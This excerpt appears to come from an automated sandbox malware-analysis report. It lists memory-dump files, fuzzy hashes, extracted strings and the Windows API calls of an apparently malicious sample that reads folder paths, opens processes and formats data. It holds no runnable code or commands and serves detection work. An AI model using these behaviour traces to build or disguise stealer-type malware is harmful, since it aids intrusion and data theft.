                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                              • Instruction ID: acf9543cb6b77b2da0464b064a02adf5d3e1efbba48625676f6e4ab8ae157c53
                              • Opcode Fuzzy Hash: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                              • Instruction Fuzzy Hash: 013186B5E005159BCB09DF58C8916AEBBB6EBC9350F148269E915DF344DB30AD01CB91
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5922
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5935
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                              • Instruction ID: de5b9a4e67ba1fd253120108cb07cda56cf3944150be46834906f7d380505236
                              • Opcode Fuzzy Hash: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                              • Instruction Fuzzy Hash: 70117030318B40CBD7338F2CE800B99B7E1ABD1765F250A5DE1D1CBA95CB61D841C7A1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003BA430,000000FF), ref: 003B3D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B3D27
                              • wsprintfA.USER32 ref: 003B3D37
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                              • Instruction ID: 55c8b65989e9512484d62ff8a4b292d72506d2bd8c27739f1b8ec383a3d3ceb8
                              • Opcode Fuzzy Hash: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                              • Instruction Fuzzy Hash: EC01C071640B14BFE7105B54DC0EFAABB6CFB55B61F000115FA05E76D0DBB42904CAA6
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398737
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                              • Instruction ID: 147508ae3cf101fd7e86a4273ce5e46083873b1a1fc580d55aab9220d8d707fe
                              • Opcode Fuzzy Hash: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                              • Instruction Fuzzy Hash: C7F02437F000210F8706657D8C8049EA80756E239033AC725E80AEF359DC30EC8281D5
                              APIs
                                • Part of subcall function 003B781C: __mtinitlocknum.LIBCMT ref: 003B7832
                                • Part of subcall function 003B781C: __amsg_exit.LIBCMT ref: 003B783E
                              • ___addlocaleref.LIBCMT ref: 003B8756
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu<$xt<
                              • API String ID: 3105635775-4126764381
                              • Opcode ID: 194ac4c29edd3183c7d35dff54aab1462d33215d2076ae87be6736e20494f4d3
                              • Instruction ID: 6e0ee922d17121832212ba1f3967e5918ed2f9d29b394c9113a6475ea52bf78e
                              • Opcode Fuzzy Hash: 194ac4c29edd3183c7d35dff54aab1462d33215d2076ae87be6736e20494f4d3
                              • Instruction Fuzzy Hash: CB01C475545700DAD722AF79C806B89F7E0EF4131CF20990DE6D69BAE0CFB0AA45CB10
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE544
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE573
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE581
                              • lstrcat.KERNEL32(?,00F2E458), ref: 003AE59C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                              • Instruction ID: b6afa45ea108bb0932386ebe0ade823aadbb64ec622d2b997562a3695133e86e
                              • Opcode Fuzzy Hash: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                              • Instruction Fuzzy Hash: FD51B576A10518AFCB56EB64DC42EFE337DEB58300F044498FA069B241EE70AE458BA0
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003B1FDF, 003B1FF5, 003B20B7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                              • Instruction ID: 9cd6ce351d5159f8c2aa8fae8036f6d0dbfc5210f7352259ff4a18d3748d7b6a
                              • Opcode Fuzzy Hash: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                              • Instruction Fuzzy Hash: 34218E355102898FD722FB35C8547DFF3A7DF80369F85425ACA184BA41E336090AD796
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 003AEBF1
                              • lstrcat.KERNEL32(?,00F2F3E8), ref: 003AEC0C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                              • Instruction ID: d2e225385208428da1226ee1b91a698941a32008c27e09fbdcedf7ecf6d3a702
                              • Opcode Fuzzy Hash: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                              • Instruction Fuzzy Hash: 89319572A11519AFCF26EF64DC46FEE73B4FF58300F1104A8BA06AB240DE309E548B94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003BA3D0,000000FF), ref: 003B2B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003B2B96
                              • GetLocalTime.KERNEL32(?,?,00000000,003BA3D0,000000FF), ref: 003B2BA2
                              • wsprintfA.USER32 ref: 003B2BCE
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                              • Instruction ID: ab218757dbacdf8f7a195d36e351499450dfb3ead9e059ef60f57790e523e2b2
                              • Opcode Fuzzy Hash: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                              • Instruction Fuzzy Hash: D20140B2904928ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7785544D7B5
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 003B4492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003B44AD
                              • CloseHandle.KERNEL32(00000000), ref: 003B44B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B44E7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                              • Instruction ID: b5d6e7a26b1215cb1cced5a4d49aa5d772173ad7930d88829af495b8661589b6
                              • Opcode Fuzzy Hash: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                              • Instruction Fuzzy Hash: EAF0FCB1901A152FE7219B759C4DFEA76A8EF14304F054590FB45D7181DBB08C94C7D4
                              APIs
                              • __getptd.LIBCMT ref: 003B8FDD
                                • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                              • __getptd.LIBCMT ref: 003B8FF4
                              • __amsg_exit.LIBCMT ref: 003B9002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 003B9026
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
